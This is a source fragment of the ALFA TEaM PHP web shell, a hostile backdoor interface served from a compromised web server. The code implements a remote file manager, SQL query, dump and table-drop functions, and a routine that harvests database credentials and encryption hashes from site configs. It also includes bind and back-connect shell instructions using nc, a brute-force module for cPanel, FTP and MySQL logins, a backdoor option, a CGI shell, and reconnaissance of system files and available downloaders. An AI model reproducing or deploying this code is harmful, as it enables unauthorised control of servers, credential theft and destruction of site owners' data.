echo ‘if(alfa’.$j.’!=null)d.mf.alfa’.$j.’.value=alfa’.$j.’;else d.mf.alfa’.$j.’.value=alfa’.$j.’_;’;
}
echo ”
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}”;
echo ‘function fc(a){alfaloader(“block”);var b=”a=”+alfab64(“FilesMan”)+”&c=”+alfab64(a.c.value)+”&alfa1=”+alfab64(a.alfa1.value)+”&ajax=”+alfab64(“true”)+”&”,c=””;for(i=0;i<d.files.elements.length;i++)”checkbox”==d.files.elements[i].type&&d.files.elements[i].checked&&(c+=”f[]=”+alfab64(d.files.elements[i].value)+”&”);_Ajax(d.URL,b+c,function(a){alfaloader(“none”)},!0)}function initDir(a){var b=””,c=””;islinux&&(b=”<a class=\”header_pwd\” onclick=\”g(\’FilesMan\’,\’/\’);\” href=\’javascript:void(0);\’>/</a>”,c=”/”);var e=a.split(“/”),f=””,g=””;”-1″!=e.indexOf(“..”)&&(e.splice(e.indexOf(“..”)-1,1),e.splice(e.indexOf(“..”),1));for(i in e)””!=e[i]&&(f+=”<a onclick=\”g(\’FilesMan\’,\’”+g+e[i]+”/\’);\” href=\’javascript:void(0);\’ class=\”header_pwd\”>”+e[i]+”/</a>”,g+=e[i]+”/”);$(“header_cwd”).innerHTML=b+f+” “;var e=c+e.join(“/”);e=e.replace(“//”,”/”),d.footer_form.c.value=e,$(“footer_cwd”).value=e,c_=e}function evalJS(html){var newElement=document.createElement(“div”);newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName(“script”),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject(“Microsoft.XMLHTTP”)),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&(“function”!=typeof c?d.getElementsByClassName(“ajaxarea”)[0].innerHTML=f.responseText:e?(d.getElementsByClassName(“ajaxarea”)[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open(“POST”,a,!0),f.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”),f.send(b),void 0):void alert(“Error !”)}function handleup(a,b){var c=”__fnameup”;0!=b&&(c=”__fnameup”+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader(“block”);a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject(“Microsoft.XMLHTTP”)),b){var c=$(“up_bar”);b.upload&&(c.style.display=”block”,b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+”%”;c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,”a=”+alfab64(“FilesMan”)+”&c=”+a.c.value+”&ajax=”+alfab64(“true”)),c.style.display=”none”,a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert(“An error occurred!”),$(“footerup”).value=””,$(“__fnameup”).innerHTML=””;upcount;){var f=$(“pfooterup_”+upcount);f&&f.parentNode.removeChild(f),upcount–}0==upcount&&upcount++,alfaloader(“none”),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open(“POST”,d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),”GetConfig”!=a&&”download”!=alfa2&&(d.getElementsByClassName(“ajaxarea”)[0].innerHTML=\’<center><br /><img id=”alfaloader” src=”‘.__showicon(‘loader’).’”></img><br /><br /></center>\’),islinux&&”/”!=d.mf.c.value.substr(0,1)&&(d.mf.c.value=”/”+d.mf.c.value);for(var data=”a=”+alfab64(a)+”&c=”+alfab64(d.mf.c.value)+”&”,i=1;i<=10;i++)data+=”alfa”+i+”=”+alfab64(eval(“d.mf.alfa”+i+”.value”))+”&”;if(data+=”&ajax=”+alfab64(“true”),”FilesTools”==a&&”download”==alfa2){var dl=$(“dlForm”);return dl.a.value=alfab64(“dlfile”),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}”GetConfig”!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader(“block”),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($(“db_host”)&&($(“db_host”).value=a.host),$(“db_user”)&&($(“db_user”).value=a.user),$(“db_name”)&&($(“db_name”).value=a.dbname),$(“db_pw”)&&($(“db_pw”).value=a.password),$(“db_prefix”)&&a.prefix&&($(“db_prefix”).value=a.prefix),$(“cc_encryption_hash”)&&a.cc_encryption_hash&&($(“cc_encryption_hash”).value=a.cc_encryption_hash))}catch(a){}alfaloader(“none”)}))}function alfaloader(a){$(“a_loader”).style.display=a}function fsu(a){alfaloader(“block”);for(var b={},c=0;c<a.elements.length;c++)”submit”!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,”a=”+alfab64(“Sql”)+”&alfa1=”+alfab64(“update”)+”&alfa2=”+alfab64(JSON.stringify(b))+”&c=”+alfab64(c_)+”&charset=”+mysql_cache.charset+”&type=”+mysql_cache.type+”&sql_host=”+mysql_cache.host+”&sql_login=”+mysql_cache.user+”&sql_pass=”+mysql_cache.pass+”&sql_base=”+mysql_cache.db+”&sql_count=”+mysql_cache.count+”&ajax=”+alfab64(“true”),function(a){evalJS(a),alfaloader(“none”)},!0)}function fs(f,e){alfaloader(“block”);var alfa1=”query”,alfa2=f.query?alfab64(f.query.value):””,host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count=””;switch(count=f.sql_count?f.sql_count.checked?”true”:””:mysql_cache.count,f){case”0″:alfa1=”select”,alfa2=alfab64(e);break;case”1″:e=eval(e),alfa1=”select”,alfa2=alfab64(e[0])+”&alfa3=”+alfab64(e[1]);break;case”2″:e=eval(e),alfa1=”edit”,alfa2=alfab64(db)+”&alfa3=”+alfab64(e.join(“:”));break;case”3″:alfa1=”loadfile”,alfa2=alfab64(e);break;case”4″:case”5″:alfa1=(f==”4″?”dumpfile”:”droptbl”);var obj={},id=$(“dumpfile”);for(obj.file=id?id.value:”dump.sql”,obj.tbl=[],i=0;i<d.sf.elements[“tbl[]”].length;++i)d.sf.elements[“tbl[]”][i].checked&&obj.tbl.push(d.sf.elements[“tbl[]”][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,”a=”+alfab64(“Sql”)+”&alfa1=”+alfab64(alfa1)+”&alfa2=”+alfa2+”&c=”+alfab64(c_)+”&charset=”+alfab64(charset)+”&type=”+alfab64(type)+”&sql_host=”+alfab64(host)+”&sql_login=”+alfab64(user)+”&sql_pass=”+alfab64(pass)+”&sql_base=”+alfab64(db)+”&sql_count=”+alfab64(count)+”&ajax=”+alfab64(“true”),function(a){evalJS(a),alfaloader(“none”)},!0)}function ctlbc(a){var b=$(“bcStatus”),c=$(“bcipAction”);”bind”==a.value?(c.style.display=”none”,b.innerHTML=”<small>Press ` <font color=\’red\’>>></font> ` button and run ` <font color=\’red\’>nc server_ip port</font> ` on your computer</small>”):(c.style.display=”inline-block”,b.innerHTML=”<small>Run ` <font color=\’red\’>nc -l -v -p port</font> ` on your computer and press ` <font color=\’red\’>>></font> ` button</small>”)}function is(){for(i=0;i<d.sf.elements[“tbl[]”].length;++i)d.sf.elements[“tbl[]”][i].checked=!d.sf.elements[“tbl[]”][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a=”footerup_”+upcount,b=”pfooterup_”+upcount,c=1!=upcount?”pfooterup_”+(upcount-1):”pfooterup”,e=d.createElement(“p”);e.innerHTML=\’<label class=”inputfile” for=”\’+a+\’”><span id=”__fnameup\’+upcount+\’”></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id=”\’+a+\’” type=”file” name=”f[]” onChange=”handleup(this,\’+upcount+\’);”>\’,e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case”all”:case”dirs”:_alfaSet(!0,”Disabled”);break;case”files”:_alfaSet(!1,”php”)}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case”phpmyadmin”:bruteSet(!0,”Disabled”,”http://”);break;case”direct”:bruteSet(!1,”2222″,”http://”);break;case”cp”:bruteSet(!1,”2082″,”http://”);break;case”ftp”:bruteSet(!0,”Disabled”,”ftp://”);break;case”mysql”:bruteSet(!1,”3306″,”http://”);break;case”ftpc”:bruteSet(!1,”21″,”http://”)}}function bruteSet(a,b,d){“21″!=b?c=”localhost”:c=”ftp.example.com”,$(“port”).disabled=a,$(“port”).value=b,$(“target”).value=c,$(“protocol”).value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value==”my”){$(“backdoor_textarea”).style.display=”block”;}else{$(“backdoor_textarea”).style.display=”none”;}}
function saveByKey(event){
if(!(String.fromCharCode(event.which).toLowerCase() == \’s\’ && event.ctrlKey) && !(event.which == 19))return true;
$(“editor_edit_area”).onsubmit();
event.preventDefault();
return false;
}
function setCookie(cname, cvalue, exdays){
var d = new Date();
d.setTime(d.getTime() + (exdays*24*60*60*1000));
var expires = “expires=”+ d.toUTCString();
document.cookie = cname + “=” + cvalue + “;” + expires + “;path=/”;
}
function getCookie(name){
var value = “; ” + document.cookie;
var parts = value.split(“; ” + name + “=”);
if (parts.length == 2) return parts.pop().split(“;”).shift();
}
function editorClose(pos){
d.body.style.overflow = “visible”;
elem = $(pos);
elem.setAttribute(“class”, “editor-anim-close”);
if(pos == “editor”){
is_minimized = false;
}else{
cgi_is_minimized = false;
}
setTimeout(function(){
elem.removeAttribute(“class”);
elem.style.display = “none”;
}, 1000);
d.body.style.overflow = “visible”;
}
function showEditor(pos){
$(pos).setAttribute(“class”, “editor-anim-show”);
$(pos+”-minimized”).setAttribute(“class”, “minimized-hide”);
if(pos == “editor”){
is_minimized = false;
if(cgi_is_minimized){
$(“cgiloader-minimized”).style.top = “30%”;
}
}else{
cgi_is_minimized = false;
if(is_minimized){
$(“editor-minimized”).style.top = “30%”;
}
}
d.body.style.overflow = “hidden”;
}
function editorMinimize(pos){
$(pos).setAttribute(“class”, “editor-anim-minimize”);
$(pos+”-minimized”).setAttribute(“class”, “minimized-show”);
if(pos == “editor”){
is_minimized = true;
if(cgi_is_minimized){
$(“cgiloader-minimized”).style.top = “20%”;
$(“editor-minimized”).style.top = “50%”;
}else{
$(“editor-minimized”).style.top = “30%”;
}
}else{
cgi_is_minimized = true;
if(is_minimized){
$(“cgiloader-minimized”).style.top = “20%”;
$(“editor-minimized”).style.top = “50%”;
}else{
$(“cgiloader-minimized”).style.top = “30%”;
}
}
d.body.style.overflow = “visible”;
}
function clearEditorHistory(){
var check = confirm(“Are u Sure?”);
if(check){
for(var i in editor_files){
if(i != editor_current_file){
removeHistory(i);
}
}
}
}
function editor(file, mode, arg, pwd, file_id, type){
if(type==”dir”&&file==”..”)return false;
if(mode == “download”){
g(“FilesTools”,pwd,file,”download”);
return false;
}
var param = “”, fid = “”, pure_fid = “”, cwd = d.mf.c.value, can_append = true;
file = file.trim();
if(Object.keys(editor_files).length == 0){
var cookie_file = getCookie(“alfa_history_files”);
try{
editor_files = JSON.parse(cookie_file);
for(var t in editor_files){
insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
}
}catch(e){}
}
if(file.indexOf(“/”) != -1){
var file_split = file.split(“/”);
file = file_split[file_split.length - 1];
delete file_split[file_split.length - 1];
cwd = file_split.join(“/”);
if(islinux){
cwd = “/”+cwd;
}
}
if(typeof type == “undefined”){
type = “”;
}
if(typeof pwd != “undefined” && pwd != null && pwd.length != 0){
cwd = pwd.trim();
}
try{
for(var i in editor_files){
if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,””) == cwd.replace(/\//g,””)){
can_append = false;
file_id = i;
break;
}
}
}catch(e){
console.log(e);
}
editor_error = true;
if(typeof arg != “undefined” && arg.length != 0 && arg != null){
param = alfab64(arg);
}
if(typeof file_id != “undefined” && file_id != null && file_id.length != 0){
fid = alfab64(file_id);
pure_fid = file_id;
}else{
var rand_fid = “file_” + getRandom(10);
fid = alfab64(rand_fid);
pure_fid = rand_fid;
}
alfaloader(“block”);
_Ajax(d.URL, “a=”+alfab64(“FilesTools”)+”&c=”+alfab64(cwd)+”&alfa1=”+alfab64(file)+”&alfa2=”+alfab64(mode)+”&alfa3=”+param+”&alfa4=”+fid+”&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax=”+alfab64(“true”), function(e){
document.querySelector(“.editor-content”).innerHTML = e;
$(“editor”).style.display  = “block”;
alfaloader(“none”);
evalJS(e);
if(mode != “delete” && editor_error){
var active = d.getElementsByClassName(“is_active”);
if(active.length != 0){
active[0].className = “file-holder”;
}
fid = pure_fid;
file = decodeURIComponent(file);

if(!editor_files[fid] && can_append){
editor_files[fid] = {“file”: file, “pwd”: cwd, “type”: type};
insertToHistory(fid, file, ” is_active”, type);
if(mode==”mkfile”){
g(“FilesMan”,null);
}
}else{
$(fid).parentNode.className += ” is_active”;
}
}
d.body.style.overflow = “hidden”;
d.getElementsByClassName(“filestools”)[0].setAttribute(“fid”, fid);
if(editor_files[fid]){
d.getElementsByClassName(“editor-path”)[0].innerHTML = (editor_files[fid].pwd + “/” + editor_files[fid].file).replace(/\/\//g, “/”);
}
editor_current_file = fid;
if(is_minimized){
showEditor(“editor”);
}
updateCookieEditor();
});
return false;
}
function insertToHistory(fid, file, mode, type){
var active = “”;
if(mode && mode != 0){
active = mode;
}
var NewElement = document.createElement(“div”);
NewElement.innerHTML = “<div id=\’”+fid+”\’ class=\’history\’ onClick=\’reopen(this);\’><div class=\’editor-icon\’>”+loadType(file,type,fid)+”</div><div class=\’editor-file-name\’>”+file+”</div></div><div class=\’history-close\’ onClick=\’removeHistory(\””+fid+”\”);\’>X</div>”;
NewElement.className = “file-holder” + active;
NewElement.addEventListener(“mouseover”, function(){setEditorTitle(fid,”over”);this.childNodes[1].style.opacity = “1″;});
NewElement.addEventListener(“mouseout”, function(){setEditorTitle(fid,”out”);this.childNodes[1].style.opacity = “0″;});
var refNode = d.getElementsByClassName(“history-list”)[0];
refNode.insertBefore(NewElement, refNode.firstChild);
}
function loadType(file,type,id){
if(type == “none”){
_Ajax(d.URL, “a=”+alfab64(“checkfiletype”)+”&path=”+alfab64(editor_files[id].pwd)+”&arg=”+alfab64(editor_files[id].file), function(e){
$(id).innerHTML = “<div class=\’editor-icon\’>”+loadType(editor_files[id].file,e,id)+”</div><div class=\’editor-file-name\’>”+editor_files[id].file+”</div>”;
editor_files[id].type = e;
});
}
var img = \’<img src=”http://solevisible.com/icons/{type}” width=”30″ height=”30″>\’;
if(type == “file”){
type = file.split(“.”);
type  = type[type.length - 1].toLowerCase();
var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
if(types.indexOf(type) == -1){
type = “notfound”;
}
}else{
type = “folder”;
}
return img.replace(“{type}”,  type + “.png”);
}
function updateDirsEditor(fid, fname){
var current_path = d.mf.c.value + “/”;
var oldpath  = editor_files[fid].pwd + “/” + fname + “/”;
var newpath  = editor_files[fid].pwd + “/” + editor_files[fid].file + “/”;
oldpath = oldpath.replace(/\/\//g, “/”);
newpath = newpath.replace(/\/\//g, “/”);
current_path = current_path.replace(/\/\//g, “/”);
if(current_path.search(oldpath) != -1){
initDir(current_path.replace(oldpath, newpath));
d.mf.c.value = current_path.replace(oldpath, newpath);
_Ajax(d.URL,”a=”+alfab64(“updatepath”)+”&path=”+alfab64(d.mf.c.value),function(e){console.log(e)});
}
for(var i in editor_files){
var path = editor_files[i].pwd + “/”;
path = path.replace(/\/\//g, “/”);
if(path.search(oldpath) != -1){
editor_files[i].pwd = path.replace(oldpath, newpath);
}
}
var reg1 = new RegExp(“\’”+oldpath.slice(0, -1)+”\’”);
var reg2 = new RegExp(fname + ” \\\|</b></a>”);
d.files.innerHTML = d.files.innerHTML.replace(reg1, “\’”+newpath.slice(0, -1)+”\’”);
d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+” |</b></a>”);
updateCookieEditor();
}
function updateCookieEditor(){
setCookie(“alfa_history_files”, JSON.stringify(editor_files), 2012);
}
function setEditorTitle(fid, mode){
if(mode == “out” && editor_current_file != “”){
fid = editor_current_file;
}
if(editor_files[fid]){
d.getElementsByClassName(“editor-path”)[0].innerHTML = (editor_files[fid].pwd + “/” + editor_files[fid].file).replace(/\/\//g, “/”);
}
}
function removeHistory(el){
delete editor_files[el];
if($(el)){
$(el).parentNode.parentNode.removeChild($(el).parentNode);
}
var elm = d.getElementsByClassName(“filestools”)[0];
if(elm){
if(elm.getAttribute(“fid”) == el){
elm.outerHTML = “”;
}
}
if(editor_current_file == el){
editor_current_file = “”;
}
updateCookieEditor();
}
function getRandom(e){
for(var i = “undefined” == typeof e ? 20 : e, t = “”, s = “0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”, n = i; n > 0; –n) t += s[Math.floor(Math.random() * s.length)];
return t
}
function reopen(el){
var file_id = el.getAttribute(“id”)
var pwd = editor_files[file_id].pwd;
var filename = editor_files[file_id].file;
editor(filename, “auto”, “”, pwd, file_id);
}
function copyToClipboard(el){
var node = document.getElementById(el);
if(document.selection){
var range = document.body.createTextRange();
range.moveToElementText(document.getElementById(el));
range.select();
document.execCommand(“Copy”);
alert(“text copied”);
}else if (window.getSelection()){
var range = document.createRange();
range.selectNode(document.getElementById(el));
window.getSelection().removeAllRanges();
window.getSelection().addRange(range);
document.execCommand(“copy”);
alert(“text copied”);
}
}
function encrypt(str, pwd) {
if (pwd == null || pwd.length <= 0) {
return null;
}
str = alfab64(str, true);
pwd = alfab64(pwd, true);
var enc_chr = “”;
var enc_str = “”;
var i = 0;
while (i < str.length) {
for (var j = 0; j < pwd.length; j++) {
enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
enc_str += String.fromCharCode(enc_chr);
i++;
if (i >= str.length) break;
}
}
return alfab64(enc_str, true);
}
function reloadSetting(e){
alfaloader(“block”);
_Ajax(d.URL,”a=”+alfab64(“settings”)+”&alfa1=”+alfab64(e.protect.value)+”&alfa2=”+alfab64(e.lgpage.value)+”&alfa3=”+alfab64(e.username.value)+”&alfa4=”+alfab64(e.password.value)+”&alfa5=”+alfab64(“>>”)+”&alfa6=”+alfab64(e.icon.value)+”&alfa7=”+alfab64(e.post_encrypt.value)+”&alfa8=”+alfab64(“main”)+”&c=”+alfab64(c_)+”&ajax=”+alfab64(“true”),function(a){evalJS(a),alfaloader(“none”)},true);
if(e.e.value==0&&e.protect.value==1)setTimeout(“location.reload()”,1000);
if(e.s.value!=e.icon.value)setTimeout(“location.reload()”,1000);
return false
}
function reloadColors(config){
var obj = {};
if(typeof config == “undefined”){
d.querySelectorAll(“.colors_input”).forEach(function(e){
var id = e.getAttribute(“target”).replace(“.”, “”);
obj[id] = e.value;
});
}else{
obj = config;
}
alfaloader(“block”);
var checdk = ($(“use_default_color”).checked?”1″:”0″);
_Ajax(d.URL,”a=”+alfab64(“settings”)+”&alfa1=”+alfab64(JSON.stringify(obj))+”&alfa2=”+alfab64(“>>”)+”&alfa3=”+alfab64(checdk)+”&alfa8=”+alfab64(“color”)+”&c=”+alfab64(c_)+”&ajax=”+alfab64(“true”),function(e){alfaloader(“none”);evalJS(e);},true);
}
function alfab64(a, normal){
if(typeof normal != “undefined” || post_encryption_mode == false){
return window.btoa(unescape(encodeURIComponent(a)));
}
return encrypt(a, “‘._AlfaSecretKey().’”);
}
function evalCss(jcss){
var style = document.createElement(“style”);
if (style.styleSheet) {
style.styleSheet.cssText = jcss;
} else {
style.appendChild(document.createTextNode(jcss));
}
d.getElementsByTagName(“head”)[0].appendChild(style);
}
function colorHandlerKey(el){
setTimeout(function(e){
colorHandler(el);
}, 200);
}
function colorHandler(el){
var target = el.getAttribute(“target”);
var multi = el.getAttribute(“multi”);
var ishover = target.indexOf(“:hover”);
if(multi){
var array = JSON.parse(atob(multi));
var jcss = “”;
for(i in array.multi_selector){
jcss += i + “{“+array.multi_selector[i].replace(/{color}/g, el.value)+”}”;
}
evalCss(jcss);
}
if(ishover != -1 && !multi){
$(“input_” + target.replace(“.”,””)).value = el.value;
$(“gui_” + target.replace(“.”,””)).value = el.value;
var css = target+”{color: “+el.value+”;}”;
evalCss(css);
}else{
$(“input_” + target.replace(“.”,””)).value = el.value;
$(“gui_” + target.replace(“.”,””)).value = el.value;
if(target == “.header_values”){
target = “.header,.header_values”;
}
d.querySelectorAll(target).forEach(function(e){
e.style.color = el.value;
});
}
}
function importConfig(event){
var input = event.target;
var reader = new FileReader();
reader.onload = function(){
var data = reader.result;
try{
var conf = JSON.parse(data);
reloadColors(conf);
}catch(e){
alert(“Config is invalid…!”);
}
$(“importFileBtn”).value = “”;
};
reader.readAsText(input.files[0]);
}
function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == “checkbox”){d.files.elements[i].checked = d.files.elements[0].checked;}}}
function path_history(pos){
_Ajax(d.URL,”a=”+alfab64(“GetPathHistory”)+”&ajax=”+alfab64(“true”),function(e){g(“FilesMan”, e);},true);
}
function runcgi(lang){
if(cgi_is_minimized && cgi_lang == lang){
showEditor(“cgiloader”);
return false;
}
_Ajax(d.URL,”a=”+alfab64(“cgishell”)+”&alfa1=”+alfab64(lang)+”&ajax=”+alfab64(“true”),function(e){
d.body.style.overflow = “hidden”;
$(“cgiloader”).style.display = “block”;
$(“cgiframe”).innerHTML = e;
cgi_lang = lang;
if(cgi_is_minimized){
$(“cgiloader-minimized”).setAttribute(“class”, “minimized-hide”);
setTimeout(function(){
$(“cgiloader”).removeAttribute(“class”);
if(is_minimized){
$(“editor-minimized”).style.top = “30%”;
}
}, 1000);
}
});
}
‘;
echo “</script>
<form style=’display:none;’ id=’dlForm’ action=” target=’_blank’ method=’post’>
<input type=’hidden’ name=’a’ value=’dlfile’>
<input type=’hidden’ name=’c’ value=”>
<input type=’hidden’ name=’file’ value=”>
</form>
<input type=’file’ style=’display:none;’ id=’importFileBtn’ onchange=’importConfig(event);’>
<img id=’a_loader’ src=’”.__showicon(‘loader’).”‘>”;
$cmd_uname = alfaEx(“uname -a”,false,false);
$uname = function_exists(‘php_uname’) ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:’( php_uname ) Function Disabled !’);
if($uname==”( php_uname ) Function Disabled !”){$GLOBALS["need_to_update_header"]=”true”;}
echo ‘
</head>
<body bgcolor=”#000000″ leftmargin=”0″ topmargin=”0″ marginwidth=”0″ marginheight=”0″>
<div id=”up_bar”></div>
<div class=”whole”>
<form method=”post” name=”mf” style=”display:none;”>
<input type=”hidden” name=”a”>
<input type=”hidden” name=”c” value=”‘.$GLOBALS['cwd'].’”>’;
for($s=1;$s<=10;$s++){
echo ‘<input type=”hidden” name=”alfa’.$s.’”>’;
}
echo ‘<input type=”hidden” name=”charset”>
</form>
<div id=\’hidden_sh\’><a class=”alert_green” target=”_blank” href=”?solevisible”>Hidden Shell<br><small>Version: <span class=”hidden_shell_version”>’.__ALFA_VERSION__.’</span></small></a></div>
<div class=”header”><table width=”100%” border=”0″>
<tr>
<td width=”3%”><span class=”header_vars”>Uname:</span></td>
<td colspan=”2″><span class=”header_values” id=”header_uname”>’.$uname.’</span></td>
</tr>
<tr>
<td><span class=”header_vars”>User:</span></td>
<td><span class=”header_values” id=”header_userid”>’. $uid . ‘ [ ' . $user . ' ] </span><span class=”header_vars”> Group: </span><span class=”header_values” id=”header_groupid”>’ . $gid . ‘ [ ' . $group . ' ]</span> </td>
<td width=”12%” rowspan=”8″><img style=”border-radius:100px;” width=”300″ height=”170″ alt=”” src=”http://solevisible.com/images/alfa-iran.png” /></td>
</tr>
<tr>
<td><span class=”header_vars”>PHP:</span></td>
<td><b>’.@phpversion(). ‘ </b><span class=”header_vars”> Safe Mode: ‘.$safe_modes.’</span></td>
</tr>
<tr>
<td><span class=”header_vars”>ServerIP:</span></td>
<td><b>’.(!@$_SERVER["SERVER_ADDR"]?(function_exists(“gethostbyname”)?@gethostbyname($_SERVER['SERVER_NAME']):’????’):@$_SERVER["SERVER_ADDR"]).’ <span class=”header_vars”>Your IP:</span><b> ‘.@$_SERVER["REMOTE_ADDR"].’</b></td>
</tr>
<tr>
<td width=”3%”><span class=”header_vars”>DateTime:</span></td>
<td colspan=”2″><b>’.date(‘Y-m-d H:i:s’).’</b></td>
</tr>
<tr>
<td><span class=”header_vars”>Domains:</span></td>
<td width=”76%”><span class=”header_values” id=”header_domains”>’;
if($GLOBALS['sys']==’unix’){
$d0mains = _alfa_file(“/etc/named.conf”,false);
if(!$d0mains){echo “Cant Read [ /etc/named.conf ]“;$GLOBALS["need_to_update_header"]=”true”;}else{
$count=0;
foreach($d0mains as $d0main){
if(@strstr($d0main,”zone”)){
preg_match_all(‘#zone “(.*)”#’, $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;}}}
echo “$count Domains”;}}
else{echo(“Cant Read [ /etc/named.conf ]“);}
echo ‘</span></td>
</tr>
<tr>
<td height=”16″><span class=”header_vars”>HDD:</span></td>
<td><span class=”header_vars”>Total:</span><b>’.alfaSize($totalSpace).’ </b><span class=”header_vars”>Free:</span><b>’ . alfaSize($freeSpace) . ‘ ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
</tr>’;
if($GLOBALS['sys']==’unix’){
$useful_downloader = ‘<tr><td height=”18″ colspan=”2″><span class=”header_vars”>useful:</span><span class=”header_values” id=”header_useful”>————–</span></td></tr><td height=”0″ colspan=”2″><span class=”header_vars”>Downloader: </span><span class=”header_values” id=”header_downloader”>————–</span></td></tr>’;
if(!@ini_get(‘safe_mode’)){
if(strlen(alfaEx(“id”,false,false))>0){
echo ‘<tr><td height=”18″ colspan=”2″><span class=”header_vars”>Useful : </span>’;
$userful = array(‘gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzialfa2′,’nc’,’locate’,’suidperl’);
$x=0;
foreach($userful as $item)if(alfaWhich($item)){$x++;echo ‘<span class=”header_values” style=”margin-left: 4px;”>’.$item.’</span>’;}
if($x==0){echo “<span class=’header_values’ id=’header_useful’>————–</span>”;$GLOBALS["need_to_update_header"] = “true”;}
echo ‘</td>
</tr>
<tr>
<td height=”0″ colspan=”2″><span class=”header_vars”>Downloader: </span>’;
$downloaders = array(‘wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp-mirror’);
$x=0;
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ‘<span class=”header_values” style=”margin-left: 4px;”>’.$item2.’</span>’;}
if($x==0){echo “<span class=’header_values’ id=’header_downloader’>————–</span>”;$GLOBALS["need_to_update_header"] = “true”;}
echo ‘</td>
</tr>’;
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = “true”;
}
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = “true”;
}
}else{
echo ‘<tr><td height=”18″ colspan=”2″><span class=”header_vars”>Windows:</span><b>’;
echo alfaEx(‘ver’,false,false);
echo ‘</td>
</tr> <tr>
<td height=”0″ colspan=”2″><span class=”header_vars”>Downloader: </span><b>————-</b></td>
</tr></b>’;
}
$quotes = (function_exists(‘get_magic_quotes_gpc’)?get_magic_quotes_gpc():’0′);if ($quotes == “1″ or $quotes == “on”){$magic = ‘<b><span class=”header_on”>ON</span>’;}else{$magic = ‘<span class=”header_off”>OFF</span>’;}
echo ‘<tr>
<td height=”16″ colspan=”2″><span class=”header_vars”>Disable Functions: </span><b>’.Alfa_GetDisable_Function().’</b></td>
</tr>
<tr>
<td height=”16″ colspan=”2″><span class=”header_vars”>CURL :</span>’.$curl.’ | <span class=”header_vars”>SSH2 : </span>’.$ssh2.’ | <span class=”header_vars”>Magic Quotes : </span>’.$magic.’ | <span class=”header_vars”> MySQL :</span>’.$mysql.’ | <span class=”header_vars”>MSSQL :</span>’.$mssql.’ | <span class=”header_vars”> PostgreSQL :</span>’.$pg.’ | <span class=”header_vars”> Oracle :</span>’.$or.’ ‘.($GLOBALS['sys']==”unix”?’| <span class=”header_vars”> CGI :</span> ‘.$cgi_shell:””).’</td><td width=”15%”><center><a href=”http://zone-h.org/archive/notifier=ALFA%20TEaM%202012″ target=”_blank”><span><font class=”solevisible-text” color=”#0F0″>Sole Sad & Invisible</font></span></a></center></td>
